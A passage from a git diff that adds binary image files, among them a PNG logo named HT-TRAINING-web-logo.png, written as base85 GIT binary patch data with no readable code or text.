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 literal 0 HcmV?d00001 diff --git a/src/images/HT-TRAINING-web-logo.png b/src/images/HT-TRAINING-web-logo.png new file mode 100644 index 0000000000000000000000000000000000000000..ca084e3529a5d1adde7f6be7c27d93fd67c8c250 GIT binary patch literal 16066 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 